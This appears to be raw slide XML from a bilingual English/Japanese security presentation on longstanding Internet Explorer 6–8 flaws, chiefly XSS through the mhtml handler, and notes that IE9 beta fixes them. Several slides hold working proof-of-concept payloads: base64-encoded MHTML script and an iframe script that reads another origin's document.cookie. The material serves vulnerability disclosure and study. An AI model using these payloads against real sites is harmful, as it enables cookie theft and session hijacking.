                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vY3VtZW50LmxvY2F0aW9uKTs8L3Njcmlw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dD4NCjwvaHRtbD4NCg==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&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;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610" y="4365104"/>
            <a:ext cx="6552728" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003366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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;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39552" y="3005265"/>
            <a:ext cx="6768752" cy="2520280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100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5589240"/>
            <a:ext cx="38519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b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Injected by attacker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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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484784"/>
            <a:ext cx="7272808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DAE7F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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>:http://example.com/test.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="24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2204864"/>
            <a:ext cx="7272808" cy="4154984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&lt;html&gt;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&lt;div&gt;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Subject: test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Content-Type: text/html;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charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=us-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ascii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Content-Transfer-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vY3VtZW50LmxvY2F0aW9uKTs8L3Njcmlw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dD4NCjwvaHRtbD4NCg==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&lt;/div&gt;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&lt;/html&gt;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3573016"/>
            <a:ext cx="5184576" cy="153946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ja-JP" sz="4000" b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Should be fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="4000" b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by MS07-034</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="4000" b="1">
              <a:effectLst>
                <a:glow rad="101600">
                  <a:schemeClr val="bg1">
                    <a:alpha val="60000"/>
                  </a:schemeClr>
                </a:glow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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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6"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Should be fixed by MS07-034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66</a:t>
            </a:fld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9826"/>
            <a:ext cx="87725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7627743" cy="18745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正方形/長方形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="5589240"/>
            <a:ext cx="72008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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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6"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>XSS via mhtml again.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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>による</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>再び</a:t>
            </a:r>
            <a:endParaRPr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"JavaScript execution via MHTML-scheme" at HTML5 Security Cheatsheet by @Lever_One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http://heideri.ch/jso/#96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XSS with mhtml handler</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1"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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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2060848"/>
            <a:ext cx="8820472" cy="3754874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700" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; 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&lt;body&gt;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 &lt;b&gt;some content without two new line \n\n&lt;/b&gt;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Content-Type: multipart/related; boundary="***"&lt;b&gt;some content without two new line&lt;/b&gt;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--***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Content-Location: xss.html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Content-Transfer-Encoding: base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1700" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1700" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg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--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&lt;/body&gt; &lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="170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412776"/>
            <a:ext cx="8784976" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003366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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mhtml:http://heideri.ch/jso/test.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!xss.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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8562" y="4077072"/>
            <a:ext cx="8640960" cy="140038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en-US" altLang="ja-JP" sz="1700" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;iframe name=lo style=display:none&gt;&lt;/iframe&gt;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&lt;script&gt;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url=location.href;document.getElementsByName('lo')[0].src=url.substring(6,url.indexOf('/',15));setTimeout("alert(frames['lo'].document.cookie)",2000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1700" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="17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XSS with mhtml handler</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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824536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Published : May 2004 in Japan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2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に日本で公開</a:t>
            </a:r>
            <a:endParaRPr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Once fixed : Jun 2007 by MS07-034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2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS07-034</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>でいったん修正</a:t>
            </a:r>
            <a:endParaRPr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Reopened : Jun 2010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2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に再発</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Affected : IE6 / IE7 / IE8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" smtClean="0"/>
              <a:t>XP only?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean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69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Obfuscated JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>難読化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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836712"/>
            <a:ext cx="8892480" cy="320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3789040"/>
            <a:ext cx="8507288" cy="2520280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:srgbClr val="FFFFFF"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>More info from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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http://www.malwaredomainlist.com/forums/index.php?topic=4354.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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395536" y="5517232"/>
            <a:ext cx="835292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70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infomation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 leakage via CSS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71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infomation leakage via CSS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3629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3629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3629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23629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3224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0016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6  7  8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3629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3224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3224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035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73224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035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3224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4035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3224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7504" y="764704"/>
            <a:ext cx="8856984" cy="5544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979712" y="2636912"/>
            <a:ext cx="4752528" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:srgbClr val="FFFFFF"/>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>How is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="8000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:srgbClr val="FFFFFF"/>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>IE9?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="8000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="228600">
                  <a:srgbClr val="FFFFFF"/>
                </a:glow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8172400" y="1844824"/>
            <a:ext cx="504056" cy="4176464"/>
          </a:xfrm>
          <a:prstGeom prst="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95536" y="980728"/>
            <a:ext cx="83529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mtClean="0"/>
              <a:t>Untouched flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>放置されたままの脆弱性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6624736"/>
            <a:ext cx="2133600" cy="332656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB7A3B08-6B92-4B0D-AB63-EC8965080B81}" type="slidenum">
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72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flaws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smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>affect</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="24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89766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MLang encode conversion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6451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JSON Hijack with UTF-7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3652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bypass Content-Disposition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52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infomation leakage via CSS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8053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JavaScript back-quote issue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95536" y="17728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95536" y="321297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95536" y="393305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95536" y="4653136"/>
            <a:ext cx="8352928" cy="8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952456" y="33652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52456" y="40852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952456" y="48053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6120172" y="3465004"/>
            <a:ext cx="52565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95536" y="55172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latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>XSS with mhtml handler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395536" y="6093296"/>
            <a:ext cx="83529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6952456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448400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4208" y="13216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6  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1600" b="1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7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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kumimoji="1" lang="en-US" altLang="ja-JP" sz="1600" b="1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8 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1600" b="1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 9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52456" y="19168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48400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52456" y="26177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48400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56512" y="33569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48400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56512" y="40770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448400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456512" y="47971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48400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456512" y="55172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smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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8000" dirty="0" smtClean="0"/>
              <a:t>Fixed at IE9b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ベータでは修正済み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6000" dirty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73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ja-JP" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>まとめ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6000" dirty="0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74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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>まとめ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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smtClean="0"/>
              <a:t>IE6/7/8 have many flaws which were spotted ages ago and still have not been effectively addressed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IE6/7/8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>とも長いあいだ修正されていない問題が多数存在</a:t>
            </a:r>
            <a:endParaRPr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These are fixed in IE9 beta.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IE9 beta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ではそれらは修正済み</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Report flaws of IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>while beta, if you find.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IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の問題を見つけたならベータの間に報告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Probably, too slowly to fix after releasing IE9 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>リリース後は修正は遅くなるかも</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003399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75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References </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参考資料</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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1800" smtClean="0"/>
